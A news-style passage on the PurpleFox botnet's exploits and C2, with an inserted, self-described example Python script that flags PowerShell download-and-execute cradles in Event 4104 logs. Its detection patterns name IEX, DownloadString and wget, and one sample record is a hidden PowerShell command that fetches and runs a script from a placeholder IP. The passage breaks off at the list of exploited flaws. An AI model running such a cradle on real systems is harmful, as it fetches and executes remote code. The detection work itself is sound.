The PurpleFox botnet has refreshed its arsenal with new vulnerability exploits and dropped payloads, and now also uses WebSockets for bidirectional command-and-control (C2) communication.
Although it is mainly based in China, the PurpleFox botnet still has a global presence through hundreds of compromised servers.
Its activity starts with the execution of a PowerShell command that downloads a malicious payload from a URL pointing to one of the currently available C2 servers.
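A defender's view of that first step is PowerShell script-block logging (Event ID 4104): the one-liner that fetches the payload is recorded in full unless it is obfuscated. The triage routine below is an added example, not code from the article, from Trend Micro, or from the malware itself; the article does not say which cmdlets PurpleFox's command uses, so the download-and-execute idioms it matches (DownloadString, Invoke-WebRequest, IEX, hidden windows, encoded commands), the host names and the sample log records are all constructed assumptions.

```python
"""Triage PowerShell script-block log entries (Event ID 4104) for
download-and-execute cradles.  Added example; not PurpleFox's or
Trend Micro's code.  Cmdlet patterns and sample events are assumed."""
import re

# Idioms common to one-line PowerShell stagers.  The article only says the
# chain starts with a PowerShell command fetching a payload from a C2 URL;
# which cmdlets PurpleFox uses is an assumption, so several are covered.
INDICATORS = {
    "download_string": re.compile(r"\.DownloadString\s*\(", re.I),
    "download_file": re.compile(r"\.DownloadFile\s*\(", re.I),
    "invoke_webrequest": re.compile(r"(?<![\w-])(Invoke-WebRequest|iwr|wget|curl)\b", re.I),
    "invoke_expression": re.compile(r"(?<![\w-])(Invoke-Expression|iex)\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden\b", re.I),
    "encoded_command": re.compile(r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"`;)]+", re.I)

FETCH = {"download_string", "download_file", "invoke_webrequest"}        # gets the payload
ESCALATORS = {"invoke_expression", "encoded_command", "hidden_window"}   # runs or hides it


def triage(script: str) -> dict:
    """Score one script block: 'high' for fetch + URL + execute/evasion,
    'medium' for fetch + URL alone or for an encoded command whose content
    cannot be judged without decoding, 'none' otherwise."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(script)}
    urls = URL_RE.findall(script)
    if hits & FETCH and urls:
        severity = "high" if hits & ESCALATORS else "medium"
    elif "encoded_command" in hits or (hits & ESCALATORS and urls):
        severity = "medium"
    else:
        severity = "none"
    return {"severity": severity, "indicators": sorted(hits), "urls": urls}


def scan_events(events: list) -> list:
    """Run triage over 4104-style records and keep only the ones worth a look."""
    findings = []
    for ev in events:
        result = triage(ev["script"])
        if result["severity"] != "none":
            findings.append({"host": ev["host"], "record_id": ev["record_id"], **result})
    return findings


# Constructed sample records (not real telemetry).  Record 1 imitates a
# generic download cradle; the IP is from a documentation range.
SAMPLE_EVENTS = [
    {"record_id": 1, "host": "ws-0412",
     "script": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
               ".DownloadString('http://203.0.113.10/a.ps1')\""},
    {"record_id": 2, "host": "ws-0207",
     "script": "Invoke-WebRequest -Uri https://updates.corp.example/agent.msi "
               "-OutFile C:\\Temp\\agent.msi"},
    {"record_id": 3, "host": "ws-0207",
     "script": "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"},
]

if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print(f"{hit['host']} #{hit['record_id']}: {hit['severity']} "
              f"{hit['indicators']} {hit['urls']}")
```

The benign software-update fetch still scores medium because a fetch plus a URL is all the logic can see; the point of the tiering is that a hidden window, an IEX or an encoded command on top of the fetch is what separates a stager from an admin's download, and an encoded command is flagged on its own because the URL it carries is invisible until decoded.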
The payload used in recent campaigns tracked by researchers at Trend Micro is a long script that comprises three privilege escalation components.
These target Windows 7 through Windows 10, but only 64-bit builds.
The flaws that are exploited by the latest PurpleFox variants are the following: ... ... ...